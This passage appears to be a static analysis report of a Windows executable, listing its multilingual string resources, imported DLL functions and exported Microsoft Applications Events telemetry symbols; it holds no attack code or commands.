                                                                        RT_STRING0x4fc1e400x488dataFrenchFrance0.38448275862068965
                                                                        RT_STRING0x4fc22c80x38edataHebrewIsrael0.43626373626373627
                                                                        RT_STRING0x4fc26580x3f0dataHungarianHungary0.4117063492063492
                                                                        RT_STRING0x4fc2a480x40cdataItalianItaly0.3590733590733591
                                                                        RT_STRING0x4fc2e540x2f8dataJapaneseJapan0.48026315789473684
                                                                        RT_STRING0x4fc314c0x2b6PCX ver. 2.5 image data bounding box [48708, 32] - [51473, 51077], 201-bit uncompressedKoreanNorth Korea0.5446685878962536
                                                                        RT_STRING0x4fc314c0x2b6PCX ver. 2.5 image data bounding box [48708, 32] - [51473, 51077], 201-bit uncompressedKoreanSouth Korea0.5446685878962536
                                                                        RT_STRING0x4fc34040x3ecdataDutchNetherlands0.37350597609561753
                                                                        RT_STRING0x4fc37f00x414dataNorwegianNorway0.3544061302681992
                                                                        RT_STRING0x4fc3c040x472dataPolishPoland0.36994727592267135
                                                                        RT_STRING0x4fc40780x44adataPortugueseBrazil0.36885245901639346
                                                                        RT_STRING0x4fc44c40x422dataRomanianRomania0.3629489603024575
                                                                        RT_STRING0x4fc48e80x424dataRussianRussia0.4028301886792453
                                                                        RT_STRING0x4fc4d0c0x41edataCroatianCroatia0.3766603415559772
                                                                        RT_STRING0x4fc512c0x45cdataSlovakSlovakia0.3835125448028674
                                                                        RT_STRING0x4fc55880x42adataSwedishSweden0.3630393996247655
                                                                        RT_STRING0x4fc59b40x41adataThaiThailand0.42952380952380953
                                                                        RT_STRING0x4fc5dd00x3dedataTurkishTurkey0.4161616161616162
                                                                        RT_STRING0x4fc61b00x416dataIndonesianIndonesia0.3632887189292543
                                                                        RT_STRING0x4fc65c80x430dataUkrainianUkrain0.39738805970149255
                                                                        RT_STRING0x4fc69f80x45edataSlovenianSlovenia0.37209302325581395
                                                                        RT_STRING0x4fc6e580x424dataEstonianEstonia0.36981132075471695
                                                                        RT_STRING0x4fc727c0x3dadataLatvianLativa0.3995943204868154
                                                                        RT_STRING0x4fc76580x3fedataLithuanianLithuania0.4021526418786693
                                                                        RT_STRING0x4fc7a580x450dataVietnameseVietnam0.42028985507246375
                                                                        RT_STRING0x4fc7ea80x45cdataAzeriItaly0.3906810035842294
                                                                        RT_STRING0x4fc83040x424dataBasqueFrance0.3745283018867924
                                                                        RT_STRING0x4fc83040x424dataBasqueSpain0.3745283018867924
                                                                        RT_STRING0x4fc87280xfedataSetsuanaSouth Africa0.5
                                                                        RT_STRING0x4fc88280x110dataXhosaSouth Africa0.5147058823529411
                                                                        RT_STRING0x4fc89380x468dataHindiIndia0.4033687943262411
                                                                        RT_STRING0x4fc8da00x44cdataMalteseMalta0.3936363636363636
                                                                        RT_STRING0x4fc91ec0x420dataMalayMalaysia0.3740530303030303
                                                                        RT_STRING0x4fc960c0x45edataBengaliIndia0.43112701252236135
                                                                        RT_STRING0x4fc9a6c0x470dataGujaratiIndia0.4128521126760563
                                                                        RT_STRING0x4fc9edc0x492dataOriyaIndia0.3769230769230769
                                                                        RT_STRING0x4fca3700x446dataTamilIndia0.4113345521023766
                                                                        RT_STRING0x4fca3700x446dataTamilSri Lanka0.4113345521023766
                                                                        RT_STRING0x4fca7b80x500dataTeluguIndia0.39375
                                                                        RT_STRING0x4fcacb80x4aedataKannadaKanada0.3964941569282137
                                                                        RT_STRING0x4fcb1680x540dataMalayalamIndia0.3757440476190476
                                                                        RT_STRING0x4fcb6a80x43adataAssameseIndia0.4565619223659889
                                                                        RT_STRING0x4fcbae40x46adataMarathiIndia0.3920353982300885
                                                                        RT_STRING0x4fcbf500x42edataWelshEngland0.3897196261682243
                                                                        RT_STRING0x4fcc3800x406dataKhmerVietnam0.458252427184466
                                                                        RT_STRING0x4fcc3800x406dataKhmerThailand0.458252427184466
                                                                        RT_STRING0x4fcc7880x30cdataAmharicEthiopia0.5153846153846153
                                                                        RT_STRING0x4fcca940x462dataNepaliNepal0.39572192513368987
                                                                        RT_STRING0x4fccef80x464dataFilipinoPhilippines0.3487544483985765
                                                                        RT_STRING0x4fcd35c0xe8data0.5431034482758621
                                                                        RT_STRING0x4fcd4440x4b4data0.36710963455149503
                                                                        RT_STRING0x4fcd8f80xecdataIgboNigeria0.5084745762711864
                                                                        RT_STRING0x4fcd9e40x426dataMaoriNew Zealand0.3578154425612053
                                                                        RT_STRING0x4fcde0c0x430data0.3591417910447761
                                                                        RT_STRING0x4fce23c0x21cdataChineseChina0.587037037037037
                                                                        RT_STRING0x4fce4580x402dataEnglishGreat Britain0.37816764132553604
                                                                        RT_STRING0x4fce85c0x436dataNorwegianNorway0.349721706864564
                                                                        RT_STRING0x4fcec940x444dataPortuguesePortugal0.3782051282051282
                                                                        RT_STRING0x4fcf0d80x49adataGaelicIreland0.3548387096774194
                                                                        RT_STRING0x4fcf5740x414data0.36302681992337166
                                                                        RT_STRING0x4fcf9880x3d4data0.38571428571428573
                                                                        RT_STRING0x4fcfd5c0x440dataBosnianBosnian0.3795955882352941
                                                                        RT_STRING0x4fd019c0x4a2data0.3802698145025295
                                                                        RT_STRING0x4fd06400x45adata0.3734290843806104
                                                                        RT_STRING0x4fd0a9c0x454data0.4007220216606498
                                                                        RT_STRING0x4fd0ef00x102data0.5348837209302325
                                                                        RT_MESSAGETABLE0x4fd0ff40x64dataEnglishUnited States0.75
                                                                        RT_GROUP_ICON0x4fd10580x68dataEnglishUnited States0.6923076923076923
                                                                        RT_VERSION0x4fd10c00x3f4dataEnglishUnited States0.4318181818181818
                                                                        RT_MANIFEST0x4fd14b40x584XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4468838526912181
                                                                        DLLImport
                                                                        bcrypt.dllBCryptEncrypt, BCryptGenerateSymmetricKey, BCryptCloseAlgorithmProvider, BCryptSetProperty, BCryptGenRandom, BCryptDestroyKey, BCryptOpenAlgorithmProvider
                                                                        ntdll.dllRtlVirtualUnwind, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwindEx, RtlUnwind, VerSetConditionMask, RtlCaptureContext
                                                                        wer.dllWerReportCreate, WerReportCloseHandle, WerReportSubmit, WerReportSetParameter
                                                                        KERNEL32.dllGetProcessIoCounters, GetPrivateProfileStringW, WritePrivateProfileStringW, SetDllDirectoryW, MoveFileExW, ReplaceFileW, GetComputerNameW, RegisterApplicationRestart, GetFileInformationByHandleEx, OpenFileById, GetDllDirectoryW, CompareStringOrdinal, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, ReadConsoleW, SetStdHandle, GetConsoleMode, GetConsoleOutputCP, EnumSystemLocalesW, IsValidLocale, GetFileInformationByHandle, GetFileAttributesExW, GetFileAttributesW, GetDiskFreeSpaceExW, FindVolumeClose, FindNextVolumeW, FindFirstVolumeW, SetThreadInformation, GetSystemTimes, SetProcessShutdownParameters, CreateProcessW, GetExitCodeProcess, GetProcessTimes, WaitForMultipleObjects, Sleep, CreateEventW, ReleaseMutex, GetLongPathNameW, SetLastError, VerifyVersionInfoW, GetProductInfo, CopyFileW, ExpandEnvironmentStringsW, LCMapStringW, WideCharToMultiByte, MultiByteToWideChar, K32GetModuleFileNameExW, GetUserDefaultLocaleName, GetUserDefaultLCID, GetUserGeoID, LCIDToLocaleName, MoveFileW, GetVersionExW, GetSystemTimeAsFileTime, OpenProcess, TerminateProcess, GetCurrentProcess, Process32NextW, WaitForSingleObject, GetModuleFileNameW, GetTempPathW, GetCommandLineW, CreateDirectoryW, WerUnregisterFile, WerRegisterFile, SystemTimeToFileTime, SetFileTime, LoadLibraryW, GetProcAddress, FreeLibrary, DeviceIoControl, FindNextFileW, FindFirstFileW, FindClose, GetSystemTime, GetCurrentThreadId, GetCurrentProcessId, CloseHandle, WriteFile, DeleteFileW, CreateFileW, CompareFileTime, DeleteCriticalSection, InitializeCriticalSectionEx, CreateSymbolicLinkW, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, HeapDestroy, ReadDirectoryChangesW, GetLocaleInfoW, CompareStringW, GetTimeFormatW, GetDateFormatW, GetCurrentThread, GetStdHandle, ExitProcess, VirtualProtect, VirtualAlloc, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, PeekNamedPipe, GetDriveTypeW, FreeLibraryAndExitThread, ResumeThread, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, LoadLibraryExW, IsWow64Process, PostQueuedCompletionStatus, ExitThread, GetQueuedCompletionStatus, CreateThread, TlsFree, SizeofResource, GetLastError, TlsSetValue, TlsGetValue, TlsAlloc, InterlockedPushEntrySList, Process32FirstW, CreateMutexW, GetCPInfo, CompareStringEx, LCMapStringEx, EncodePointer, CreateIoCompletionPort, CreatePipe, SetHandleInformation, IsDebuggerPresent, FindFirstFileNameW, GetCompressedFileSizeW, SetFilePointer, SetFileInformationByHandle, GetTickCount64, CreateEventExW, FlsFree, DecodePointer, LocalFree, FlsSetValue, FlsGetValue, FlsAlloc, CreateHardLinkW, SetFilePointerEx, FindFirstFileExW, GetCurrentDirectoryW, GetLocaleInfoEx, AcquireSRWLockShared, ReleaseSRWLockShared, QueryPerformanceFrequency, SleepConditionVariableSRW, SleepConditionVariableCS, WakeAllConditionVariable, WakeConditionVariable, InitializeConditionVariable, GetExitCodeThread, SwitchToThread, GetStringTypeW, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, LocalAlloc, LeaveCriticalSection, EnterCriticalSection, GetEnvironmentVariableW, SetFileAttributesW, SetCachedSigningLevel, CreateDirectoryA, GetShortPathNameW, RemoveDirectoryA, GetTempFileNameA, CompareStringA, FileTimeToLocalFileTime, FileTimeToDosDateTime, WriteConsoleW, GetTempFileNameW, FindResourceExW, CreateToolhelp32Snapshot, RemoveDirectoryW, ReadFile, GetVolumePathNameW, GetFinalPathNameByHandleW, GetFileType, GetFileSizeEx, GetProcessHeap, WaitForMultipleObjectsEx, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetComputerNameExW, GetLocalTime, LoadResource, LockResource, GetFileSize, GetPriorityClass, SetPriorityClass, GetThreadPriority, GlobalMemoryStatusEx, QueueUserWorkItem, GetUserDefaultUILanguage, FindResourceW, SetThreadPriority, LoadLibraryExA, VirtualFree, FlushInstructionCache, InterlockedPopEntrySList, OutputDebugStringA, GetModuleFileNameA, GetModuleHandleW, GetModuleHandleExW, GetTimeZoneInformation, RaiseException, GetNativeSystemInfo, GetSystemPowerStatus, FlushFileBuffers, GetTickCount, QueryPerformanceCounter, MapViewOfFile, CreateFileMappingW, FormatMessageA, LockFileEx, UnlockFile, HeapCompact, GetSystemInfo, DeleteFileA, WaitForSingleObjectEx, LoadLibraryA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesA, GetDiskFreeSpaceA, FormatMessageW, GetTempPathA, HeapValidate, UnmapViewOfFile, UnlockFileEx, SetEndOfFile, GetFullPathNameA, LockFile, GetDiskFreeSpaceW, GetFullPathNameW, HeapCreate, AreFileApisANSI, InitializeCriticalSection, TryEnterCriticalSection, InitOnceExecuteOnce, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, GetStartupInfoW, VirtualQuery, InitializeSRWLock
                                                                        USER32.dllUnregisterClassW, GetMessageW, TranslateMessage, DispatchMessageW, IsDialogMessageW, PostMessageW, PostThreadMessageW, PostQuitMessage, AllowSetForegroundWindow, GetShellWindow, GetSystemMetrics, SendMessageW, AttachThreadInput, IsWindow, SetWindowPos, IsWindowVisible, BringWindowToTop, CreateDialogParamW, DialogBoxParamW, GetDlgItem, SetActiveWindow, GetForegroundWindow, SetForegroundWindow, SetWindowTextW, GetClientRect, GetWindowRect, MapWindowPoints, SetWindowLongW, GetWindowLongW, SetWindowLongPtrW, GetParent, GetWindow, LoadIconW, MonitorFromWindow, GetMonitorInfoW, PeekMessageW, MsgWaitForMultipleObjectsEx, SetCursor, LoadCursorW, EnumWindows, GetClassNameW, GetWindowThreadProcessId, SystemParametersInfoW, SendMessageTimeoutW, RegisterPowerSettingNotification, UnregisterPowerSettingNotification, RegisterClassW, CreateWindowExW, DestroyWindow, RegisterClipboardFormatW, ShowWindow, OpenClipboard, CloseClipboard, SetClipboardData
                                                                        ADVAPI32.dllInitializeSid, RegGetValueA, EventRegister, EventWriteTransfer, EventUnregister, EventWrite, EventSetInformation, CredWriteW, CredReadW, CredDeleteW, CredFree, RegOverridePredefKey, LookupAccountNameW, CryptDestroyKey, CryptSetHashParam, CryptImportKey, GetSecurityDescriptorDacl, CreateProcessWithTokenW, GetUserNameW, SetFileSecurityW, ConvertSidToStringSidW, SetNamedSecurityInfoW, GetNamedSecurityInfoW, SetEntriesInAclW, StartServiceW, StartServiceCtrlDispatcherW, SetServiceStatus, RegisterServiceCtrlHandlerW, QueryServiceStatusEx, QueryServiceStatus, QueryServiceConfigW, OpenServiceW, OpenSCManagerW, DeleteService, CreateServiceW, ControlService, CloseServiceHandle, ChangeServiceConfig2W, ChangeServiceConfigW, RegDeleteTreeW, RegUnLoadKeyW, RegLoadKeyW, RegEnumKeyW, RegDeleteKeyExW, RegCreateKeyTransactedW, GetAclInformation, FreeSid, DuplicateTokenEx, CreateWellKnownSid, AllocateAndInitializeSid, CreateProcessAsUserW, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegGetValueW, RegSetKeyValueW, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegCreateKeyExW, RegCloseKey, LookupPrivilegeValueW, IsValidSid, GetTokenInformation, GetSidSubAuthorityCount, GetSidSubAuthority, GetSidLengthRequired, GetLengthSid, EqualSid, CopySid, AdjustTokenPrivileges, OpenProcessToken, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, AddAce, DeleteAce, GetAce, InitializeAcl, ConvertStringSidToSidW, CredEnumerateW, ImpersonateLoggedOnUser, RevertToSelf
                                                                        SHELL32.dllShellExecuteW, SHFileOperationW, SHLoadNonloadedIconOverlayIdentifiers, SHGetFolderPathW, CommandLineToArgvW, SHCreateDirectoryExW, SHGetKnownFolderPath, SHGetSpecialFolderPathW, SHChangeNotify, SHParseDisplayName, ShellExecuteExW, SHCreateItemFromParsingName, SHAssocEnumHandlers, SHGetFolderPathAndSubDirW, SHSetKnownFolderPath, SHGetFolderPathA
                                                                        ole32.dllGetRunningObjectTable, CreateItemMoniker, CoSetProxyBlanket, CLSIDFromString, CoInitialize, CreateBindCtx, StringFromGUID2, CoCreateInstance, CoCreateGuid, CoTaskMemFree, CoInitializeEx, CoUninitialize, CoCreateFreeThreadedMarshaler, CreateStreamOnHGlobal, CoTaskMemAlloc, PropVariantClear, CoWaitForMultipleHandles, StringFromCLSID, CoGetObject
                                                                        OLEAUT32.dllGetErrorInfo, VarBstrCmp, VariantChangeType, VariantClear, VariantInit, SysAllocStringByteLen, SysStringByteLen, SysStringLen, SysAllocStringLen, SysAllocString, SysFreeString, SetErrorInfo, LoadTypeLib, LoadRegTypeLib, GetRecordInfoFromTypeInfo
                                                                        IPHLPAPI.DLLGetAdaptersInfo
                                                                        RstrtMgr.DLLRmRegisterResources, RmEndSession, RmStartSession, RmGetList
                                                                        CRYPT32.dllCertFindExtension, CertGetEnhancedKeyUsage, CryptBinaryToStringW, CryptStringToBinaryW, CertVerifyCertificateChainPolicy, CertFreeCertificateChain
                                                                        RPCRT4.dllRpcExceptionFilter, UuidCreate, RpcBindingFree, RpcBindingFromStringBindingW, RpcBindingVectorFree, RpcStringFreeW, UuidToStringW, RpcStringBindingComposeW, RpcServerInqCallAttributesW, RpcEpUnregister, RpcEpRegisterW, RpcBindingSetAuthInfoExW, RpcServerUseProtseqW, RpcServerUnregisterIf, RpcServerRegisterIfEx, RpcServerInqBindings
                                                                        Secur32.dllGetUserNameExW
                                                                        SHLWAPI.dllStrStrIW, PathIsPrefixW, PathStripToRootW, PathStripPathW, PathSkipRootW, PathIsRelativeW, SHRegGetUSValueW, SHGetValueW, PathFindFileNameW, PathIsDirectoryW, PathRemoveFileSpecW, SHDeleteKeyW, SHDeleteValueW, SHGetValueA, SHSetValueW, SHRegGetValueW, SHRegGetPathW, SHRegGetBoolUSValueW, AssocQueryStringW, SHCreateStreamOnFileW, SHCreateStreamOnFileEx, PathFindExtensionW, PathIsDirectoryEmptyW, PathFileExistsW, PathFileExistsA, PathFindFileNameA, PathGetDriveNumberA, PathIsDirectoryA, SHCreateStreamOnFileA
                                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                        WININET.dllHttpQueryInfoA, HttpAddRequestHeadersA, HttpOpenRequestA, InternetQueryOptionW, InternetReadFile, InternetConnectA, InternetCloseHandle, InternetSetStatusCallbackW, InternetOpenW, InternetCrackUrlA, InternetCheckConnectionW, HttpSendRequestW
                                                                        WS2_32.dllhtonl, socket, bind, accept, htons, WSAStartup, setsockopt, send, closesocket, WSAGetLastError, listen
                                                                        WTSAPI32.dllWTSQuerySessionInformationW, WTSEnumerateSessionsW, WTSFreeMemory, WTSQueryUserToken
                                                                        USERENV.dllCreateEnvironmentBlock, UnloadUserProfile, GetDefaultUserProfileDirectoryW
                                                                        GDI32.dllGetObjectW, DeleteObject, SetDIBColorTable, CreateCompatibleDC, DeleteDC, SelectObject, CreateDIBSection
                                                                        urlmon.dllURLOpenStreamW
                                                                        gdiplus.dllGdipDisposeImage, GdipCloneImage, GdiplusStartup, GdipFree, GdipAlloc, GdiplusShutdown, GdipGetImagePalette, GdipGetImagePaletteSize, GdipCreateBitmapFromStream, GdipCreateBitmapFromScan0, GdipBitmapLockBits, GdipGetImageGraphicsContext, GdipGetImagePixelFormat, GdipBitmapUnlockBits, GdipDeleteGraphics, GdipDrawImageI, GdipGetImageHeight, GdipGetImageWidth
                                                                        COMCTL32.dll
                                                                        WINTRUST.dllWTHelperGetProvSignerFromChain, WTHelperProvDataFromStateData, WinVerifyTrustEx
                                                                        WINHTTP.dllWinHttpConnect, WinHttpCloseHandle, WinHttpOpen, WinHttpCrackUrl, WinHttpQueryDataAvailable, WinHttpOpenRequest, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpQueryHeaders, WinHttpReadData
                                                                        Cabinet.dll
                                                                        NameOrdinalAddress
                                                                        ?$TSS0@?1??stateLock@DebugEventSource@Events@Applications@Microsoft@@KAAEAVrecursive_mutex@std@@XZ@4HA10x140483c30
                                                                        ??0DebugEventDispatcher@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z20x140099950
                                                                        ??0DebugEventDispatcher@Events@Applications@Microsoft@@QEAA@XZ30x140099950
                                                                        ??0DebugEventListener@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z40x140099960
                                                                        ??0DebugEventListener@Events@Applications@Microsoft@@QEAA@XZ50x140099960
                                                                        ??0DebugEventSource@Events@Applications@Microsoft@@QEAA@$$QEAV0123@@Z60x140099970
                                                                        ??0DebugEventSource@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z70x140099a30
                                                                        ??0DebugEventSource@Events@Applications@Microsoft@@QEAA@XZ80x1400379f0
                                                                        ??0EventProperties@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z90x1400a1440
                                                                        ??0EventProperties@Events@Applications@Microsoft@@QEAA@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z100x1400a1490
                                                                        ??0EventProperties@Events@Applications@Microsoft@@QEAA@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEBV?$map@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@@std@@@2@@5@@Z110x1400a14c0
                                                                        ??0EventProperties@Events@Applications@Microsoft@@QEAA@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@E@Z120x1400a1510
                                                                        ??0EventProperties@Events@Applications@Microsoft@@QEAA@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$initializer_list@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@@std@@@5@@Z130x1400a1610
                                                                        ??0EventProperties@Events@Applications@Microsoft@@QEAA@XZ140x1400a1670
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@$$QEAU0123@@Z150x1400a69f0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@AEAV?$vector@NV?$allocator@N@std@@@std@@W4PiiKind@123@W4DataCategory@123@@Z160x1400a6a40
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@AEAV?$vector@UGUID_t@Events@Applications@Microsoft@@V?$allocator@UGUID_t@Events@Applications@Microsoft@@@std@@@std@@W4PiiKind@123@W4DataCategory@123@@Z170x1400a6ab0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@AEAV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@W4PiiKind@123@W4DataCategory@123@@Z180x1400a6b20
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@AEAV?$vector@_JV?$allocator@_J@std@@@std@@W4PiiKind@123@W4DataCategory@123@@Z190x1400a6b90
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@AEBU0123@@Z200x1400a69f0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4PiiKind@123@W4DataCategory@123@@Z210x1400a6c00
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@CW4PiiKind@123@W4DataCategory@123@@Z220x1400a6c80
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@EW4PiiKind@123@W4DataCategory@123@@Z230x1400a6cb0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@FW4PiiKind@123@W4DataCategory@123@@Z240x1400a6ce0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@GW4PiiKind@123@W4DataCategory@123@@Z250x1400a6d10
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@HW4PiiKind@123@W4DataCategory@123@@Z260x1400a6d40
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@IW4PiiKind@123@W4DataCategory@123@@Z270x1400a6d70
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@JW4PiiKind@123@W4DataCategory@123@@Z280x1400a6d40
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@NW4PiiKind@123@W4DataCategory@123@@Z290x1400a6da0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@PEBDW4PiiKind@123@W4DataCategory@123@@Z300x1400a6dd0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@UGUID_t@123@W4PiiKind@123@W4DataCategory@123@@Z310x1400a6e60
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@Utime_ticks_t@123@W4PiiKind@123@W4DataCategory@123@@Z320x1400a6ea0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@XZ330x1400a6ed0
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@_JW4PiiKind@123@W4DataCategory@123@@Z340x1400a6f40
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@_KW4PiiKind@123@W4DataCategory@123@@Z350x1400a6f40
                                                                        ??0EventProperty@Events@Applications@Microsoft@@QEAA@_NW4PiiKind@123@W4DataCategory@123@@Z360x1400a6f70
                                                                        ??0GUID_t@Events@Applications@Microsoft@@QEAA@AEBU0123@@Z370x1400a6f90
                                                                        ??0GUID_t@Events@Applications@Microsoft@@QEAA@HHHAEBV?$initializer_list@E@std@@@Z380x1400a6fd0
                                                                        ??0GUID_t@Events@Applications@Microsoft@@QEAA@PEBD@Z390x1400a7010
                                                                        ??0GUID_t@Events@Applications@Microsoft@@QEAA@QEBE_N@Z400x1400a70f0
                                                                        ??0GUID_t@Events@Applications@Microsoft@@QEAA@U_GUID@@@Z410x1400a71d0
                                                                        ??0GUID_t@Events@Applications@Microsoft@@QEAA@XZ420x1400a7240
                                                                        ??0IAuthTokensController@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z430x140099aa0
                                                                        ??0IAuthTokensController@Events@Applications@Microsoft@@QEAA@XZ440x140099aa0
                                                                        ??0ILogConfiguration@Events@Applications@Microsoft@@QEAA@$$QEAV0123@@Z450x140099ab0
                                                                        ??0ILogConfiguration@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z460x140099b50
                                                                        ??0ILogConfiguration@Events@Applications@Microsoft@@QEAA@AEBV?$initializer_list@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@VVariant@Events@Applications@Microsoft@@@std@@@std@@@Z470x1400a42b0
                                                                        ??0ILogConfiguration@Events@Applications@Microsoft@@QEAA@XZ480x140037b80
                                                                        ??0ILogController@Events@Applications@Microsoft@@QEAA@$$QEAV0123@@Z490x140099ba0
                                                                        ??0ILogController@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z500x140099ba0
                                                                        ??0ILogController@Events@Applications@Microsoft@@QEAA@XZ510x140099ba0
                                                                        ??0ILogManager@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z520x140099bb0
                                                                        ??0ILogManager@Events@Applications@Microsoft@@QEAA@XZ530x140099bb0
                                                                        ??0ILogger@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z540x140099be0
                                                                        ??0ILogger@Events@Applications@Microsoft@@QEAA@XZ550x140099be0
                                                                        ??0IModule@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z560x140099bf0
                                                                        ??0IModule@Events@Applications@Microsoft@@QEAA@XZ570x140099bf0
                                                                        ??0ISemanticContext@Events@Applications@Microsoft@@QEAA@AEBV0123@@Z580x140099c00
                                                                        ??0ISemanticContext@Events@Applications@Microsoft@@QEAA@XZ590x140099c00
                                                                        ??0LogConfiguration@Telemetry@Applications@Microsoft@@QEAA@$$QEAU0123@@Z600x140099c10
                                                                        ??0LogConfiguration@Telemetry@Applications@Microsoft@@QEAA@AEBU0123@@Z610x140099d10
                                                                        ??0LogConfiguration@Telemetry@Applications@Microsoft@@QEAA@XZ620x140099dd0
                                                                        ??0time_ticks_t@Events@Applications@Microsoft@@QEAA@AEBU0123@@Z630x14009a840
                                                                        ??0time_ticks_t@Events@Applications@Microsoft@@QEAA@PEB_J@Z640x1400a7250
                                                                        ??0time_ticks_t@Events@Applications@Microsoft@@QEAA@XZ650x1400a7270
                                                                        ??0time_ticks_t@Events@Applications@Microsoft@@QEAA@_K@Z660x1400a7280
                                                                        ??1DebugEventDispatcher@Events@Applications@Microsoft@@UEAA@XZ670x1400094a0
                                                                        ??1DebugEventListener@Events@Applications@Microsoft@@UEAA@XZ680x1400094a0
                                                                        ??1DebugEventSource@Events@Applications@Microsoft@@UEAA@XZ690x140038cc0
                                                                        ??1EventProperties@Events@Applications@Microsoft@@UEAA@XZ700x1400a1a30
                                                                        ??1EventProperty@Events@Applications@Microsoft@@UEAA@XZ710x1400a72c0
                                                                        ??1IAuthTokensController@Events@Applications@Microsoft@@UEAA@XZ720x14009a1c0
                                                                        ??1ILogConfiguration@Events@Applications@Microsoft@@QEAA@XZ730x140049f30
                                                                        ??1ILogManager@Events@Applications@Microsoft@@UEAA@XZ740x14009a1d0
                                                                        ??1ILogger@Events@Applications@Microsoft@@UEAA@XZ750x14009a200
                                                                        ??1IModule@Events@Applications@Microsoft@@UEAA@XZ760x1400094a0
                                                                        ??1ISemanticContext@Events@Applications@Microsoft@@UEAA@XZ770x14009a210
                                                                        ??1LogConfiguration@Telemetry@Applications@Microsoft@@QEAA@XZ780x14009a220
                                                                        ??4DebugEventDispatcher@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z790x14000bad0
                                                                        ??4DebugEventListener@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z800x14000bad0
                                                                        ??4DebugEventSource@Events@Applications@Microsoft@@QEAAAEAV0123@$$QEAV0123@@Z810x14009a4d0
                                                                        ??4DebugEventSource@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z820x14009a580
                                                                        ??4EventProperties@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV0123@@Z830x1400a1b60
                                                                        ??4EventProperties@Events@Applications@Microsoft@@QEAAAEAV0123@AEBV?$map@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@@std@@@2@@std@@@Z840x1400a1b80
                                                                        ??4EventProperties@Events@Applications@Microsoft@@QEAAAEAV0123@V?$initializer_list@U?$pair@$$CBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@UEventProperty@Events@Applications@Microsoft@@@std@@@std@@@Z850x1400a1bc0
                                                                        ??4EventProperty@Events@Applications@Microsoft@@QEAAAEAU0123@AEBU0123@@Z860x1400a72d0
